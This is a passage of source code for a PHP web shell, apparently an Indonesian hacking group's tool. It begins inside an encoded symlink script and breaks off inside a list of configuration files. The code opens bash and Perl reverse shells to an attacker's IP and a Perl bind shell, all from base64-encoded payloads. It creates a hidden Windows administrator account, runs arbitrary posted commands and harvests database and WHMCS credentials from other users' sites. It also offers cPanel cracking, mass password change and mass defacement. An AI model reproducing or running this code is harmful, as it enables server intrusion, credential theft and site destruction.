G1sL3NlY3VyZS93aG0vc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9zZWN1cmUvd2htY3Mvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9wYW5lbC9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL2NsaWVudGVzL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvY2xpZW50ZS9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL3N1cHBvcnQvb3JkZXIvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9DQopOw0KZm9yZWFjaCAoQGFycmF5KXsNCglteSAkY29uZmlnbnlhID0gJF8tPntjb25maWdkaXJ9Ow0KCW15ICR0eXBlY29uZmlnID0gJF8tPnt0eXBlfTsNCglzeW1saW5rKCIkY29uZmlnbnlhIiwiaWR4X3N5bTQwNC8kdXNlcm55YS0kdHlwZWNvbmZpZy50eHQiKTsNCglta2RpciAiaWR4X3N5bTQwNC8kdXNlcm55YS0kdHlwZWNvbmZpZy50eHQ0MDQiOw0KCXN5bWxpbmsoIiRjb25maWdueWEiLCJpZHhfc3ltNDA0LyR1c2VybnlhLSR0eXBlY29uZmlnLnR4dDQwNC8weDE5OTkudHh0Iik7DQoJY29weSgiaWR4X3N5bTQwNC9uZW11LnR4dCIsImlkeF9zeW00MDQvJHVzZXJueWEtJHR5cGVjb25maWcudHh0NDA0Ly5odGFjY2VzcyIpIDsNCgl9DQp9DQpwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsNCnByaW50ICI8aGVhZD48dGl0bGU+QnlwYXNzIDQwNCBCeSAweDE5OTk8L3RpdGxlPjwvaGVhZD4iOw0KcHJpbnQgJzxtZXRhIGh0dHAtZXF1aXY9InJlZnJlc2giIGNvbnRlbnQ9IjU7IHVybD1pZHhfc3ltNDA0Ii8+JzsNCnByaW50ICc8Ym9keT48Y2VudGVyPjxoMT4weDE5OTkgTmV2ZXIgRGllPC9oMT4nOw0KcHJpbnQgJzxhIGhyZWY9ImlkeF9zeW00MDQiPktsaWsgRGlzaW5pPC9hPic7DQp1bmxpbmsoJDApOw==";\n\t\t\t\t\tsave("/tmp/symlink404.pl", "w", base64_decode($sym[\'code\']));\n\t\t\t\t\texe("perl /tmp/symlink404.pl");\n\t\t\t\t\tsleep(1);\n\t\t\t\t\t@unlink("/tmp/symlink404.pl");\n\t\t\t\t\t@unlink("passwd.txt");\n\t\t\t\t\t@unlink("lanang_sym404/pas.txt");\n\t\t\t\t\t@unlink("lanang_sym404/nemu.txt");\n\t\t\t\t}\n\n\t\t\t\tprint "<div style=\'background: #ffffff; width: 100%; height: 100%\'>";\n\t\t\t\tprint "<iframe src=\'http://".$_SERVER[\'HTTP_HOST\']."/".$GLOBALS[\'FILEPATH\']."/lanang_sym404/\' frameborder=\'0\' scrolling=\'yes\'></iframe>";\n\t\t\t\tprint "</div>";\n\t\t\t}\n\t\t}\n\t}\n\telseif($toolsname === "network") {\n\t\t$args = explode(" ", $args);\n\n\t\tif($args[0] === "bc") {\n\t\t\tif(empty($args[1])) die(color(1, 1, "Set Your IP for BackConnect!"));\n\t\t\tif(empty($args[2])) die(color(1, 1, "Set Your PORT for BackConnect!"));\n\t\t\tif(empty($args[3])) die(color(1, 1, "Missing type of reverse shell: \'bash\', \'perl\'."));\n\n\t\t\tif($args[3] === "bash") {\n\t\t\t\texe("/bin/bash -i >& /dev/tcp/".$args[1]."/".$args[2]." 0>&1");\n\t\t\t}\n\t\t\telseif($args[3] === "perl") {\n\t\t\t\t$bc[\'code\'] = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";\n\t\t\t\tsave("/tmp/bc.pl", "w", base64_decode($bc[\'code\']));\n\t\t\t\t$bc[\'exec\'] = exe("perl /tmp/bc.pl ".$args[1]." ".$args[2]." 1>/dev/null 2>&1 &");\n\t\t\t\tsleep(1);\n\t\t\t\tprint "<pre>".$bc[\'exec\']."\\n".exe("ps aux | grep bc.pl")."</pre>";\n\t\t\t\t@unlink("/tmp/bc.pl");\n\t\t\t}\n\t\t}\n\t\telseif($args[0] === "bp") {\n\t\t\tif(empty($args[1])) die(color(1, 1, "Set Your PORT for Bind Port!"));\n\t\t\tif(empty($args[2])) die(color(1, 1, "Missing type of reverse shell: \'bash\', \'perl\'."));\n\n\t\t\tif($args[2] === "perl") {\n\t\t\t\t$bp[\'code\'] = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";\n\t\t\t\tsave("/tmp/bp.pl", "w", base64_decode($bp[\'code\']));\n\t\t\t\t$bp[\'exec\'] = exe("perl /tmp/bp.pl ".$args[1]." 1>/dev/null 2>&1 &");\n\t\t\t\tsleep(1);\n\t\t\t\tprint "<pre>".$bp[\'exec\']."\\n".exe("ps aux | grep bp.pl")."</pre>";\n\t\t\t\t@unlink("/tmp/bp.pl");\n\t\t\t}\n\t\t}\n\t\telse {\n\t\t\tprint color(1, 1, "Unknown \'".$args[0]."\'");\n\t\t}\n\t}\n\telseif($toolsname === "krdp") {\n\t\t$args = explode(" ", $args);\n\n\t\tif(OS() !== "Windows") die(color(1, 1, "Just For Windows Server"));\n\t\tif(preg_match("/lanang404x/", exe("net user"))) die(color(1, 1, "[INFO] username \'lanang404x\' already exists."));\n\n\t\t$add_user = exe("net user lanang404x lanang404x /add");\n \t$add_groups1 = exe("net localgroup Administrators lanang404x /add");\n \t$add_groups2 = exe("net localgroup Administrator lanang404x /add");\n \t$add_groups3 = exe("net localgroup Administrateur lanang404x /add");\n\n \tprint "[ RDP ACCOUNT INFO ]<br>\n \t------------------------------<br>\n \tIP: ".color(1, 2, $GLOBALS[\'SERVERIP\'])."<br>\n \tUsername: ".color(1, 2, "lanang404x")."<br>\n \tPassword: ".color(1, 2, "lanang404x")."<br>\n \t------------------------------<br><br>\n \t[ STATUS ]<br>\n \t------------------------------<br>\n \t";\n\n \tif($add_user) {\n \t\tprint "[add user] -> ".color(1, 2, "SUCCESS")."<br>";\n \t} \n \telse {\n \t\tprint "[add user] -> ".color(1, 1, "FAILED")."<br>";\n \t}\n \t\n \tif($add_groups1) {\n \tprint "[add localgroup Administrators] -> ".color(1, 2, "SUCCESS")."<br>";\n \t} \n \telseif($add_groups2) {\n print "[add localgroup Administrator] -> ".color(1, 2, "SUCCESS")."<br>";\n \t} \n \telseif($add_groups3) { \n print "[add localgroup Administrateur] -> ".color(1, 2, "SUCCESS")."<br>";\n \t} \n \telse {\n \t\tprint "[add localgroup] -> ".color(1, 1, "FAILED")."<br>";\n \t}\n\n \tprint "------------------------------<br>";\n\t}\n}\n\nfunction files_and_folder() {\n\tif(!is_dir(path())) die(color(1, 1, "Directory \'".path()."\' is not exists."));\n\tif(!is_readable(path())) die(color(1, 1, "Directory \'".path()."\' not readable."));\n\tprint \'<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">\n\t\t <tr>\n\t\t <th class="th_home"><center>Name</center></th>\n\t\t <th class="th_home"><center>Type</center></th>\n\t\t <th class="th_home"><center>Size</center></th>\n\t\t <th class="th_home"><center>Last Modified</center></th>\n\t\t <th class="th_home"><center>Owner/Group</center></th>\n\t\t <th class="th_home"><center>Permission</center></th>\n\t\t <th class="th_home"><center>Action</center></th>\n\t\t </tr>\';\n\n\tif(function_exists(\'opendir\')) {\n\t\tif($opendir = opendir(path())) {\n\t\t\twhile(($readdir = readdir($opendir)) !== false) {\n\t\t\t\t$dir[] = $readdir;\n\t\t\t}\n\t\t\tclosedir($opendir);\n\t\t}\n\t\tsort($dir);\n\t} else {\n\t\t$dir = scandir(path());\n\t}\n\n\tforeach($dir as $folder) {\n\t\t$dirinfo[\'path\'] = path().DIRECTORY_SEPARATOR.$folder;\n\t\tif(!is_dir($dirinfo[\'path\'])) continue;\n\t\t$dirinfo[\'type\'] = filetype($dirinfo[\'path\']);\n\t\t$dirinfo[\'time\'] = date("F d Y g:i:s", filemtime($dirinfo[\'path\']));\n\t\t$dirinfo[\'size\'] = "-";\n\t\t$dirinfo[\'perms\'] = writeable($dirinfo[\'path\'], perms($dirinfo[\'path\']));\n\t\t$dirinfo[\'link\'] = ($folder === ".." ? "<a href=\'?dir=".dirname(path())."\'>$folder</a>" : ($folder === "." ? "<a href=\'?dir=".path()."\'>$folder</a>" : "<a href=\'?dir=".$dirinfo[\'path\']."\'>$folder</a>"));\n\t\t$dirinfo[\'action\']= ($folder === \'.\' || $folder === \'..\') ? "<a href=\'?act=newfile&dir=".path()."\'>newfile</a> | <a href=\'?act=newfolder&dir=".path()."\'>newfolder</a>" : "<a href=\'?act=rename_folder&dir=".$dirinfo[\'path\']."\'>rename</a> | <a href=\'?act=delete_folder&dir=".$dirinfo[\'path\']."\'>delete</a>";\n\t\tif(function_exists(\'posix_getpwuid\')) {\n\t\t\t$dirinfo[\'owner\'] = (object) @posix_getpwuid(fileowner($dirinfo[\'path\']));\n\t\t\t$dirinfo[\'owner\'] = $dirinfo[\'owner\']->name;\n\t\t} else {\n\t\t\t$dirinfo[\'owner\'] = fileowner($dirinfo[\'path\']);\n\t\t}\n\t\tif(function_exists(\'posix_getgrgid\')) {\n\t\t\t$dirinfo[\'group\'] = (object) @posix_getgrgid(filegroup($dirinfo[\'path\']));\n\t\t\t$dirinfo[\'group\'] = $dirinfo[\'group\']->name;\n\t\t} else {\n\t\t\t$dirinfo[\'group\'] = filegroup($dirinfo[\'path\']);\n\t\t}\n\t\tprint "<tr>";\n\t\tprint "<td class=\'td_home\'><img src=\'data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=\'>".$dirinfo[\'link\']."</td>";\n\t\tprint "<td class=\'td_home\' style=\'text-align: center;\'>".$dirinfo[\'type\']."</td>";\n\t\tprint "<td class=\'td_home\' style=\'text-align: center;\'>".$dirinfo[\'size\']."</td>";\n\t\tprint "<td class=\'td_home\' style=\'text-align: center;\'>".$dirinfo[\'time\']."</td>";\n\t\tprint "<td class=\'td_home\' style=\'text-align: center;\'>".$dirinfo[\'owner\'].DIRECTORY_SEPARATOR.$dirinfo[\'group\']."</td>";\n\t\tprint "<td class=\'td_home\' style=\'text-align: center;\'>".$dirinfo[\'perms\']."</td>";\n\t\tprint "<td class=\'td_home\' style=\'padding-left: 15px;\'>".$dirinfo[\'action\']."</td>";\n\t\tprint "</tr>";\n\t}\n\tforeach($dir as $files) {\n\t\t$fileinfo[\'path\'] = path().DIRECTORY_SEPARATOR.$files;\n\t\tif(!is_file($fileinfo[\'path\'])) continue;\n\t\t$fileinfo[\'type\'] = filetype($fileinfo[\'path\']);\n\t\t$fileinfo[\'time\'] = date("F d Y g:i:s", filemtime($fileinfo[\'path\']));\n\t\t$fileinfo[\'size\'] = filesize($fileinfo[\'path\'])/1024;\n\t\t$fileinfo[\'size\'] = round($fileinfo[\'size\'],3);\n\t\t$fileinfo[\'size\'] = ($fileinfo[\'size\'] > 1024) ? round($fileinfo[\'size\']/1024,2). "MB" : $fileinfo[\'size\']. "KB";\n\t\t$fileinfo[\'perms\']= writeable($fileinfo[\'path\'], perms($fileinfo[\'path\']));\n\t\tif(function_exists(\'posix_getpwuid\')) {\n\t\t\t$fileinfo[\'owner\'] = (object) @posix_getpwuid(fileowner($fileinfo[\'path\']));\n\t\t\t$fileinfo[\'owner\'] = $fileinfo[\'owner\']->name;\n\t\t} else {\n\t\t\t$fileinfo[\'owner\'] = fileowner($fileinfo[\'path\']);\n\t\t}\n\t\tif(function_exists(\'posix_getgrgid\')) {\n\t\t\t$fileinfo[\'group\'] = (object) @posix_getgrgid(filegroup($fileinfo[\'path\']));\n\t\t\t$fileinfo[\'group\'] = $fileinfo[\'group\']->name;\n\t\t} else {\n\t\t\t$fileinfo[\'group\'] = filegroup($fileinfo[\'path\']);\n\t\t}\n\t\tprint "<tr>";\n\t\tprint "<td class=\'td_home\'><img src=\'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=\'><a href=\'?act=view&dir=".path()."&file=".$fileinfo[\'path\']."\'>$files</a></td>";\n\t\tprint "<td class=\'td_home\' style=\'text-align: center;\'>".$fileinfo[\'type\']."</td>";\n\t\tprint "<td class=\'td_home\' style=\'text-align: center;\'>".$fileinfo[\'size\']."</td>";\n\t\tprint "<td class=\'td_home\' style=\'text-align: center;\'>".$fileinfo[\'time\']."</td>";\n\t\tprint "<td class=\'td_home\' style=\'text-align: center;\'>".$fileinfo[\'owner\'].DIRECTORY_SEPARATOR.$fileinfo[\'group\']."</td>";\n\t\tprint "<td class=\'td_home\' style=\'text-align: center;\'>".$fileinfo[\'perms\']."</td>";\n\t\tprint "<td class=\'td_home\' style=\'padding-left: 15px;\'><a href=\'?act=edit&dir=".path()."&file=".$fileinfo[\'path\']."\'>edit</a> | <a href=\'?act=rename&dir=".path()."&file=".$fileinfo[\'path\']."\'>rename</a> | <a href=\'?act=delete&dir=".path()."&file=".$fileinfo[\'path\']."\'>delete</a> | <a href=\'?act=download&dir=".path()."&file=".$fileinfo[\'path\']."\'>download</a></td>";\n\t\tprint "</tr>";\n\t}\n\n\tprint "</table>";\n\tprint "<center>Copyright © ".date("Y")." - <a href=\'https://anonsec-team.org/\' target=\'_blank\'>".color(1, 2, "L4N4N9_4K1R4")."</a></center>";\n}\n\n\nfunction action() {\n\ttools("upload");\n\ttools("cmd");\n\tprint "<hr style=\'margin-top: 15px; margin-bottom: 10px;\'>";\n\tprint "<center>";\n\tprint "<ul>";\n\tprint "<li>[ <a href=\'?\'>Home</a> ]</li>";\n\tprint "<li>[ <a href=\'?dir=".path()."&do=jumping\'>Jumping</a> ]</li>";\n\tprint "<li>[ <a href=\'?dir=".path()."&do=config\'>Config</a> ]</li>";\n\tprint "<li>[ <a href=\'?dir=".path()."&do=fakeroot\'>Fake Root</a> ]</li>";\n\tprint "<li>[ <a href=\'?dir=".path()."&do=cpanel\'>cPanel Crack</a> ]</li>";\n\tprint "<li>[ <a href=\'?dir=".path()."&do=mpc\'>Mass Password Change</a> ]</li>";\n\tprint "<li>[ <a href=\'?dir=".path()."&do=mass\'>Mass Deface/Delete</a> ]</li>";\n\tprint "<li>[ <a href=\'?dir=".path()."&do=zoneh\'>Zone-H</a> ]</li>";\n\tprint "<li>[ <a href=\'?dir=".path()."&do=krdp\'>C-RDP</a> ]</li>";\n\tprint "</ul>";\n\tprint "</center>";\n\tprint "<hr style=\'margin-top: 15px; margin-bottom: 10px;\'>";\n\n\n\tif(isset($_GET[\'do\'])) {\n\t\tif($_GET[\'do\'] === "cmd") {\n\t\t\tif(isset($_POST[\'cmd\'])) {\n\t\t\t\tif(preg_match("/^rf (.*)$/", $_POST[\'cmd\'], $match)) {\n\t\t\t\t\ttools("readfile", $match[1]);\n\t\t\t\t}\n\t\t\t\telseif(preg_match("/^spawn (.*)$/", $_POST[\'cmd\'], $match)) {\n\t\t\t\t\ttools("spawn", $match[1]);\n\t\t\t\t}\n\t\t\t\telseif(preg_match("/^symlink\\s?(.*)$/", $_POST[\'cmd\'], $match)) {\n\t\t\t\t\ttools("symlink", $match[1]);\n\t\t\t\t}\n\t\t\t\telseif(preg_match("/^rvr (.*)$/", $_POST[\'cmd\'], $match)) {\n\t\t\t\t\ttools("network", $match[1]);\n\t\t\t\t}\n\t\t\t\telseif(preg_match("/^krdp$/", $_POST[\'cmd\'])) {\n\t\t\t\t\ttools("krdp");\n\t\t\t\t}\n\t\t\t\telseif(preg_match("/^logout$/", $_POST[\'cmd\'])) {\n\t\t\t\t\tunset($_SESSION[md5($_SERVER[\'HTTP_HOST\'])]);\n\t\t\t\t\tprint "<script>window.location=\'?\';</script>";\n\t\t\t\t}\n\t\t\t\telseif(preg_match("/^killme$/", $_POST[\'cmd\'])) {\n\t\t\t\t\tunset($_SESSION[md5($_SERVER[\'HTTP_HOST\'])]);\n\t\t\t\t\t@unlink(__FILE__);\n\t\t\t\t\tprint "<script>window.location=\'?\';</script>";\n\t\t\t\t}\n\t\t\t\telse {\n\t\t\t\t\tprint "<pre>".exe($_POST[\'cmd\'])."</pre>";\n\t\t\t\t}\n\t\t\t}\n\t\t\telse {\n\t\t\t\tfiles_and_folder();\n\t\t\t}\n\t\t}\n\t\telseif($_GET[\'do\'] === "jumping") {\n\t\t\t$i = 0;\n\t\t\tforeach(getuser() as $user) {\n\t\t\t\t$path = "/home/$user/public_html";\n\t\t\t\tif(is_readable($path)) {\n\t\t\t\t\t$status = color(1, 2, "[R]");\n\t\t\t\t\tif(is_writable($path)) {\n\t\t\t\t\t\t$status = color(1, 2, "[RW]");\n\t\t\t\t\t}\n\t\t\t\t\t$i++;\n\t\t\t\t\tprint "$status <a href=\'?dir=$path\'>".color(1, 4, $path)."</a>";\n\t\t\t\t\tif(!function_exists(\'posix_getpwuid\')) print "<br>";\n\t\t\t\t\tif(!getdomainname()) print " => ".color(1, 1, "Can\'t get domain name")."<br>";\n\t\t\t\t\tforeach(getdomainname() as $domain) {\n\t\t\t\t\t\t$userdomain = (object) @posix_getpwuid(@fileowner("/etc/valiases/$domain"));\n\t\t\t\t\t\t$userdomain = $userdomain->name;\n\t\t\t\t\t\tif($userdomain === $user) {\n\t\t\t\t\t\t\tprint " => <a href=\'http://$domain/\' target=\'_blank\'>".color(1, 2, $domain)."</a><br>";\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t\tprint ($i === 0) ? "" : "<p>".color(1, 3, "Total ada $i kamar di ".$GLOBALS[\'SERVERIP\'])."</p>";\n\t\t}\n\t\telseif($_GET[\'do\'] === "config") {\n\t\t\tif(!is_writable(path())) die(color(1, 1, "Directory \'".path()."\' is not writeable. Can\'t create directory \'lanang_config\'."));\n\t\t\tif(!is_dir(path()."/lanang_config/")) {\n\t\t\t\t@mkdir(\'lanang_config\', 0755);\n\t\t\t\t$htaccess = "Options all\\nDirectoryIndex lanang404x.htm\\nSatisfy Any";\n\t\t\t\tsave("lanang_config/.htaccess","w", $htaccess);\n\n\t\t\t\tforeach(getuser() as $user) {\n\t\t\t\t\t$user_docroot = "/home/$user/public_html/";\n\t\t\t\t\tif(is_readable($user_docroot)) {\n\t\t\t\t\t\t$getconfig = array(\n\t\t\t\t\t\t\t"/home/$user/.accesshash" => "WHM-accesshash",\n\t\t\t\t\t\t\t"$user_docroot/config/koneksi.php" => "Lokomedia",\n\t\t\t\t\t\t\t"$user_docroot/forum/config.php" => "phpBB",\n\t\t\t\t\t\t\t"$user_docroot/sites/default/settings.php" => "Drupal",\n\t\t\t\t\t\t\t"$user_docroot/config/settings.inc.php" => "PrestaShop",\n\t\t\t\t\t\t\t"$user_docroot/app/etc/local.xml" => "Magento",\n\t\t\t\t\t\t\t"$user_docroot/admin/config.php" => "OpenCart",\n\t\t\t\t\t\t\t"$user_docroot/application/config/database.php" => "Ellislab",\n\t\t\t\t\t\t\t"$user_docroot/vb/includes/config.php" => "Vbulletin",\n\t\t\t\t\t\t\t"$user_docroot/includes/config.php" => "Vbulletin",\n\t\t\t\t\t\t\t"$user_docroot/forum/includes/config.php" => "Vbulletin",\n\t\t\t\t\t\t\t"$user_docroot/forums/includes/config.php" => "Vbulletin",\n\t\t\t\t\t\t\t"$user_docroot/cc/includes/config.php" => "Vbulletin",\n\t\t\t\t\t\t\t"$user_docroot/inc/config.php" => "MyBB",\n\t\t\t\t\t\t\t"$user_docroot/includes/configure.php" => "OsCommerce",\n\t\t\t\t\t\t\t"$user_docroot/shop/includes/configure.php" => "OsCommerce",\n\t\t\t\t\t\t\t"$user_docroot/os/includes/configure.php" => "OsCommerce",\n\t\t\t\t\t\t\t"$user_docroot/oscom/includes/configure.php" => "OsCommerce",\n\t\t\t\t\t\t\t"$user_docroot/products/includes/configure.php" => "OsCommerce",\n\t\t\t\t\t\t\t"$user_docroot/cart/includes/configure.php" => "OsCommerce",\n\t\t\t\t\t\t\t"$user_docroot/inc/conf_global.php" => "IPB",\n\t\t\t\t\t\t\t"$user_docroot/wp-config.php" => "Wordpress",\n\t\t\t\t\t\t\t"$user_docroot/wp/test/wp-config.php" => "Wordpress",\n\t\t\t\t\t\t\t"$user_docroot/blog/wp-config.php" => "Wordpress",\n\t\t\t\t\t\t\t"$user_docroot/beta/wp-config.php" => "Wordpress",\n\t\t\t\t\t\t\t"$user_docroot/portal/wp-config.php" => "Wordpress",\n\t\t\t\t\t\t\t"$user_docroot/site/wp-config.php" => "Wordpress",\n\t\t\t\t\t\t\t"$user_docroot/wp/wp-config.php" => "Wordpress",\n\t\t\t\t\t\t\t"$user_docroot/WP/wp-config.php" => "Wordpress",\n\t\t\t\t\t\t\t"$user_docroot/news/wp-config.php" => "Wordpress",\n\t\t\t\t\t\t\t"$user_docroot/wordpress/wp-config.php" => "Wordpress",\n\t\t\t\t\t\t\t"$user_docroot/test/wp-config.php" => "Wordpress",\n\t\t\t\t\t\t\t"$user_docroot/demo/wp-config.php" => "Wordpress",\n\t\t\t\t\t\t\t"$user_docroot/home/wp-config.php" => "Wordpress",\n\t\t\t\t\t\t\t"$user_docroot/v1/wp-config.php" => "Wordpress",\n\t\t\t\t\t\t\t"$user_docroot/v2/wp-config.php" => "Wordpress",\n\t\t\t\t\t\t\t"$user_docroot/press/wp-config.php" => "Wordpress",\n\t\t\t\t\t\t\t"$user_docroot/new/wp-config.php" => "Wordpress",\n\t\t\t\t\t\t\t"$user_docroot/blogs/wp-config.php" => "Wordpress",\n\t\t\t\t\t\t\t"$user_docroot/configuration.php" => "Joomla",\n\t\t\t\t\t\t\t"$user_docroot/blog/configuration.php" => "Joomla",\n\t\t\t\t\t\t\t"$user_docroot/submitticket.php" => "^WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/cms/configuration.php" => "Joomla",\n\t\t\t\t\t\t\t"$user_docroot/beta/configuration.php" => "Joomla",\n\t\t\t\t\t\t\t"$user_docroot/portal/configuration.php" => "Joomla",\n\t\t\t\t\t\t\t"$user_docroot/site/configuration.php" => "Joomla",\n\t\t\t\t\t\t\t"$user_docroot/main/configuration.php" => "Joomla",\n\t\t\t\t\t\t\t"$user_docroot/home/configuration.php" => "Joomla",\n\t\t\t\t\t\t\t"$user_docroot/demo/configuration.php" => "Joomla",\n\t\t\t\t\t\t\t"$user_docroot/test/configuration.php" => "Joomla",\n\t\t\t\t\t\t\t"$user_docroot/v1/configuration.php" => "Joomla",\n\t\t\t\t\t\t\t"$user_docroot/v2/configuration.php" => "Joomla",\n\t\t\t\t\t\t\t"$user_docroot/joomla/configuration.php" => "Joomla",\n\t\t\t\t\t\t\t"$user_docroot/new/configuration.php" => "Joomla",\n\t\t\t\t\t\t\t"$user_docroot/WHMCS/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/whmcs1/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/Whmcs/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/whmcs/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/whmcs/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/WHMC/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/Whmc/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/whmc/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/WHM/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/Whm/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/whm/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/HOST/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/Host/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/host/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/SUPPORTES/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/Supportes/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/supportes/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/domains/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/domain/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/Hosting/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/HOSTING/submitticket.php" => 